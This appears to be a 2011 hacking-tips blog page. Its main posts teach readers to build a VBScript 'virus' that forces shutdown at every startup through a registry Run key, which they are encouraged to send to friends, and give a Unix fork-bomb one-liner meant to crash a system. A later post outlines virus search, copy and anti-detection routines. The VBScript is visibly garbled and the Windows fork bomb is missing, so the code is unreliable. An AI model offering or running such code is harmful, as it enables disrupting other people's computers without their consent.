Saturday, 5 November 2011

How to create automatic shutdown virus...

Hello Friends,

This post of virus programming will tell you about...
how you can make a virus that will shutdown a PC Automatically at Startup.

Every time when a victim will restart his PC, it will be shutdown.

Ok, just open the notepad and type the paste the following code:

    set ws=createobject("")
    dim strDir,strfile,st,strtxt2,strshell,strlog
    dim obfso,obfolder,obshell,obfile,obtxtfile
    strlog="shutdown -l"
    set obfso=CreateObject("Scripting.FileSystemObject")
    on error resume next
    set obfile=obfso.CreateTextfile(strDir & strfile)
    obfile.writeline("set ws=createobject("&st&strshell&st&")")
    ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now save this notepad file with any name having  .vbs extension....

Now send it to ur friend.... and Frustrate your friend by shutting down his computer automatically on start up

In order to end the vbs script (stop continuous key presses), open task manager and end the wscript.exe process as shown in image below.

How to create a "fork bomb"

A fork bomb generally creates two instances at start up, further each of created processes creates two instances and so on…The processes recursively fork; this “forks” the processor and jamm it completely until a crash occurs. It use forks to do system crash, so its called Fork Bomb.

See, How to create it:

1. Fork Bomb for windows:
Write the following code in notepad and save it with bat extension say fork.bat


Once anyone will do double click on this bat file, his system will jamm.

2. Fork Bomb for linux/Unix:

    :(){ :|:& };:

Tuesday, 1 November 2011

Find who is Invisible on yahoo messanger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously.

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page.So you know that the user is online.

Monday, 31 October 2011

The Structure of a Virus

Every viable computer virus must have at least two basic parts, or subroutines, if it is even to be called a virus.

Firstly, it must contain a search routine, which locates new files or new disks which are worthwhile targets for infection. This routine will determine how well the virus reproduces, e.g., whether it does so quicklyor slowly, whether it can infect multiple disks or a single disk, and whether it can infect every portion of a disk or just certain specific areas. As with all programs, there is a size versus functionality tradeoff here. The more sophisticated the search routine is, the more space it will take up. So although an efficient search routine may help a virus to spread faster, it will make the virus bigger.

Secondly, every computer virus must contain a routine to copy itself into the program which the search routine locates. The copy routine will only be sophisticated enough to do its job without getting caught. The smaller it is, the better. How small it can be will depend on how complex a virus it must copy, and what the target is. For example, a virus which infects only COM files can get by with a much smaller copy routine than a virus which infects EXE files. This is because the EXE file structure is much more complex, so the virus must do more to attach itself to an EXE file. In addition to search and copy mechanisms, computer viruses often contain anti-detection routines, or anti-anti-virus routines. These range in complexity from something that merely keeps the date on a file the same when a virus infects it, to complex routines that camouflage viruses and trick specific anti-virus programs into believing they’re not there, or routines which turn the anti-virus they attack into a logic bomb itself.